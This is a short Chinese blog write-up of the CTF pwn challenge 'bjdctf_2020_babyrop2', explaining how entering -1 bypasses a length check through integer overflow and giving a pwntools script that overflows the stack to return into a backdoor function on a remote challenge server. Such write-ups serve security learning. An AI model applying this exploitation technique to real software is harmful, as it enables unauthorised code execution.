其他分享
首页 > 其他分享> > bjdctf_2020_babyrop2

bjdctf_2020_babyrop2

作者:互联网

exp脚本

这题的考点是整数溢出,我们通过输入 -1 绕过 if 判断,从而可以达到输入足够长数据的目的,然后题目给了后门函数,直接栈溢出控制返回地址返回后门函数即可。

from pwn import *

p = remote('node3.buuoj.cn',25193)

backdoor = 0x400726

p.sendline('-1')

sleep(0.2)
p.sendline('a'*0x18 + p64(backdoor))

p.interactive()

标签:后门,函数,babyrop2,backdoor,2020,输入,bjdctf,sendline,溢出
来源: https://www.cnblogs.com/luoleqi/p/12411774.html